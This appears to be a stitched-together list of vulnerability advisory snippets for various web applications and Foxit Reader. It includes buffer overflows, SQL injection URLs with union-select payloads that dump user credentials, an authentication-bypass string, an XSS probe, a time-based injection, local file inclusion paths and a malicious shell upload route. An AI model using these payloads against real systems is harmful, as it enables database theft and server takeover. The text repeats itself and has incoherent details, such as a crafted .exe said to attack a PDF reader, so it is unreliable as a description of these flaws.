App. has classic buffer overflow vulnerability which can be triggered by passing too long argument as a startup parameter. Shellcode can by run via classic ret overwrite or SEH Handler overwrite.
A classic buffer overflow vulnerability can be triggered by passing a too long argument as a startup parameter. Shellcode can by run via classic ret overwrite or SEH Handler overwrite.
A vulnerability exists in Foxit 4.1.1 which allows an attacker to execute arbitrary code. The vulnerability is caused due to a boundary error within the processing of the 'FoxitReader.exe' file. This can be exploited to cause a stack-based buffer overflow by e.g. enticing a user to open a specially crafted .exe file. Successful exploitation may allow execution of arbitrary code.
An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable application. This can be done by appending the malicious SQL query to the vulnerable URL parameter. For example, http://127.0.0.1/[path]/index1.php?page=-9999+union+all+select+1,group_concat(username,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15+from+bsi_adhsdgsvfe--
http://target/path/takefreestart.php?tid=242&tid2=-1+union+select+1,2,3,group_concat(user_name,0x3a,user_pass),5,6,7,8+from+admin--&nxtq=true&q_no=1
go to /signinform.php Username : admin Password : 1'or'1'='1
Multiple scripts and parameters are affected by remote SQL injection vulnerabilities. You can also manipulate SQL queries with the help of various search fields of this web app. Some example URLs: index.php?controller=app_oneorzerohelpdesk_main&subcontroller=search_management_manage&option=saved_search&global=1&id=[SQL Injection] index.php?controller=app_oneorzerohelpdesk_main&subcontroller=search_management_manage&option=show_item_search&item_types=[SQL Injection] index.php?controller=[LFI]&subcontroller=app_oneorzerotimemanager_manage&option=show_report This vulnerability can be tricky to exploit. If OpenBaseDir is set, you can at least view files in the directory of this web software.
ccBoard doesn't filter its posts for HTML... at all: <script>prompt(1)</script>. NOTE: must be logged in ?option=com_ccboard &view=myprofile &cid=63 and benchmark(5000000,md5(1))
An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable application. The crafted query can be sent via the 'p' parameter in the 'index.php' script. The query will be executed in the context of the application and can be used to extract sensitive information from the database.
EasyJobPortal is vulnerable to a remote file upload vulnerability. An attacker can register on the website, create a new document and upload a malicious shell.php file. The attacker can then access the shell.php file by editing the document. This allows the attacker to gain access to the server.
Services By CQR